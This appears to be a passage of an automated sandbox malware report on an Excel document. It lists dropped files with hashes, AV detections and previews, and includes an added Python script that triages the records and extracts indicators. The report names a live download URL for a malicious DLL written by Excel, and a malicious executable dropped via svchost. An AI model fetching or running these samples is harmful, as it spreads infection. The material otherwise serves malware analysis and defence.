                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\http_404[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\http_404[2]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Size (bytes):375808
                                                                                                                                      Entropy (8bit):4.732447683360025
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:7E9C8822BE0F73073CE2CC5EF5A13C96
                                                                                                                                      SHA1:10B2F8667DB53EAF1B85A209D9B80B834425167F
                                                                                                                                      SHA-256:BD6840CC208517847E130DB0C847E715BA80A88E210E6383B37C1D0381877EE5
                                                                                                                                      SHA-512:120BFEC74EED70DC19D7AFF9ED8DC392616A6C652F4C7B3F642219C6D5203038E66CEF65E67B79041B8653B65021E2402B3CFC0F3B6850AFD1D13E2A03637118
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                       • Antivirus: Virustotal, Detection: 48%
                                                                                                                                       • Antivirus: Metadefender, Detection: 16%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                      IE Cache URL:http://mac-rail.com/434.dll
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$._...........!...2."...........3.......@..........................................................................................t.......................P......................................................$...........................o................................... ..`.text........0...................... ..`.rdata.......@.......&..............@..@.rdata2. N...P...P...(..............@..@.data....3.......4...x..............@....rsrc...t...........................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................................................................................................
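The record above is the one dropped file in this part of the listing that matters for triage: a PE32 DLL written by EXCEL.EXE into the Internet Explorer cache, fetched from http://mac-rail.com/434.dll, flagged Malicious:true and detected by several engines. Every other entry here is a res://ieframe.dll error-page asset written by iexplore.exe itself. The script below is an added example, not Joe Sandbox code or part of this report: it parses dropped-file records in the listing's one-field-per-line Key:Value format, flags records where an Office process wrote a PE file, the file came from a remote URL, or the sandbox or AV engines marked it, and collects the hashes and URL as indicators. The two sample records are copied (abridged) from this report; the Office process list is an assumption. A Shannon entropy helper is included to show how a value like the Entropy (8bit) field is conventionally computed in bits per byte.

```python
import math
import re
from collections import Counter
from typing import Dict, List

# Sample input: two records copied (abridged) from this report's dropped-file listing,
# the malicious DLL written by EXCEL.EXE and one benign IE error-page PNG.
SAMPLE_REPORT = """\
C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\N71PG28V\\434[1].dll
Process:C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):375808
Entropy (8bit):4.732447683360025
Encrypted:false
MD5:7E9C8822BE0F73073CE2CC5EF5A13C96
SHA1:10B2F8667DB53EAF1B85A209D9B80B834425167F
SHA-256:BD6840CC208517847E130DB0C847E715BA80A88E210E6383B37C1D0381877EE5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Virustotal, Detection: 48%
IE Cache URL:http://mac-rail.com/434.dll
Preview: MZ......................@.......
C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\J7EK2SLI\\bullet[1]
Process:C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe
File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Size (bytes):447
Entropy (8bit):7.304718288205936
Encrypted:false
MD5:26F971D87CA00E23BD2D064524AEF838
SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
Malicious:false
IE Cache URL:res://ieframe.dll/bullet.png
Preview: .PNG........IHDR
"""

RECORD_START = re.compile(r"^[A-Za-z]:\\")  # a Windows path line opens a new record
AV_LINE = re.compile(r"Antivirus:\s*(?P<engine>[^,]+),\s*Detection:\s*(?P<pct>\d+)%")

# Office binaries whose writes of a PE file are suspicious (assumed list, not from the report).
OFFICE_PROCESSES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}


def parse_records(text: str) -> List[Dict[str, object]]:
    """Parse 'Key:Value' dropped-file records; AV bullet lines go into a per-record dict."""
    records: List[Dict[str, object]] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if RECORD_START.match(line):
            current = {"path": line, "av": {}}
            records.append(current)
            continue
        if current is None:
            continue  # text before the first record
        m = AV_LINE.search(line)
        if m:
            current["av"][m.group("engine").strip()] = int(m.group("pct"))
            continue
        key, sep, value = line.partition(":")  # first colon only: values may hold "C:\" or "http:"
        if sep:
            current[key.strip()] = value.strip()
    return records


def triage(record: Dict[str, object]) -> List[str]:
    """Return the reasons a dropped file deserves analyst attention (empty list if none)."""
    reasons: List[str] = []
    process = str(record.get("Process", "")).rsplit("\\", 1)[-1].lower()
    file_type = str(record.get("File Type", ""))
    preview = str(record.get("Preview", ""))
    is_pe = file_type.startswith("PE32") or preview.startswith("MZ")
    if process in OFFICE_PROCESSES and is_pe:
        reasons.append("office_process_wrote_pe")
    if str(record.get("IE Cache URL", "")).startswith(("http://", "https://")):
        reasons.append("fetched_from_remote_url")
    if str(record.get("Malicious", "")).lower() == "true":
        reasons.append("flagged_malicious")
    av: Dict[str, int] = record["av"]  # type: ignore[assignment]
    if av and max(av.values()) >= 50:
        reasons.append("av_detection")
    return reasons


def extract_iocs(text: str) -> List[Dict[str, object]]:
    """Run triage over every record and collect indicators for the suspicious ones."""
    findings = []
    for rec in parse_records(text):
        reasons = triage(rec)
        if reasons:
            findings.append({
                "path": rec["path"],
                "process": rec.get("Process", ""),
                "sha256": rec.get("SHA-256", ""),
                "md5": rec.get("MD5", ""),
                "url": rec.get("IE Cache URL", ""),
                "reasons": reasons,
            })
    return findings


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0), the usual meaning of an 'Entropy (8bit)' field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    for finding in extract_iocs(SAMPLE_REPORT):
        print(finding["sha256"], finding["url"], ", ".join(finding["reasons"]))
```

Run against the full listing, only the 434[1].dll record survives the filter, and its SHA-256, MD5 and download URL come out as the indicators to block or hunt for. The entropy helper is there for interpretation rather than detection: a PNG or JPEG sits near 8 bits per byte because it is already compressed, so the DLL's 4.73 says little on its own; what makes it interesting is the writing process and the origin URL, not its entropy.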
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WHTRT9VA\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Temp\BN6D10.tmp
                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Size (bytes):145920
                                                                                                                                      Entropy (8bit):6.592747566807753
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5105430437588F8878DA6957BC8C3119
                                                                                                                                      SHA1:818651E37EF71701165C3EB03C5C1813C1047B32
                                                                                                                                      SHA-256:D5CCF9039136D23649240CD3879F6E9D40DAE0DFF2A5CFCDEFC8535F93587C38
                                                                                                                                      SHA-512:3149A53BC48FEEA00CE6067CF5BBE94AE5B65E933FFDD5AE4139D217C2E7E7E65FA636AB021D9A374E091A791C952E6F995E6CB923DDBFCC33D4D1E575E528B1
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Virustotal, Detection: 42%, Browse
                                                                                                                                      • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T&A..G/..G/..G/......G/.....}G/.....>G/.7.T..G/..G..mG/......G/......G/......G/.Rich.G/.................PE..L....zD\...........................j@............@.............................................................................<....@...C..............................................................................d............................text............................... ..`.rdata...........0..................@..@.data....!..........................@....rsrc....C...@...D..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\F8A20000
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):43246
                                                                                                                                      Entropy (8bit):7.807914423083856
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:0E48389924E22DF71560B7AEB0304E5F
                                                                                                                                      SHA1:2AE428499E9A315BCFC7544EFF1F1A199962FE2C
                                                                                                                                      SHA-256:0C528AC1FCEE3A1ACDED25C313F5BD9488A259B90F8B01C7F18527D08C648F82
                                                                                                                                      SHA-512:0AE1FA520CFE7AF756DE8F0F6D3DC62AE78974514EEF8A8F31952D8A995DFF1499087F97FAD8F8D4938D74EB3B888208130179CB0F4C4AA67F586701A40A6EAD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .TIO.0..#.."_Q....=5..r.$x?`...Uo..h.....,j.*.$..-3...........[q.D.^.m.....o.sQQ......X"......q..*F{jE.s.+%...P."z>... .2.d.5.....T.g...CL.W8.g....o..D?....^.j.q._..VDBK_ ..5.2.&_...^{j....D:a.;...gO...;Nf2..{H...;..+_C.?.0o.....j\(..u..q.R...d....7.;...=.d.:=D..= S.:T.s].a:5.uP......t..l.....P......BO3 Hyi....C.]..)w.P?......>r....^.....y..D.t.L.S...#........#.a..7...6...?..XF.F.E[..t........PK..........!................[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF6B6FCA8DB4379CC7.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.40904041303520716
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:AA92DAB05C4E12C57362C47A01368998
                                                                                                                                      SHA1:ECBC32BED57B2B138484717670BD2855E4BD6B62
                                                                                                                                      SHA-256:65783A35659511478A7E1D4DA5E265FDF2B34ACF11CB1DEF080DB21F94F8072C
                                                                                                                                      SHA-512:AB38D247C68FE5F5601B32D3B901D8B8472933853C6DA613AC51113A7A693835535F938F57FD12ADB3FACEC73F04E2CD4476CFAAAB28399EEA54A775A652AAF8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF883191F39C641F79.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):40105
                                                                                                                                      Entropy (8bit):0.6609004523979412
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:70538966A16EE1AFD9F051D1C44915B2
                                                                                                                                      SHA1:9752DA951D1F075D0D0BD0A04080F0B04755B235
                                                                                                                                      SHA-256:D8A45E8E72D05A47D90D7B4F60A86933F101CC2FF7E27C3C50A2C0A43A3FBA24
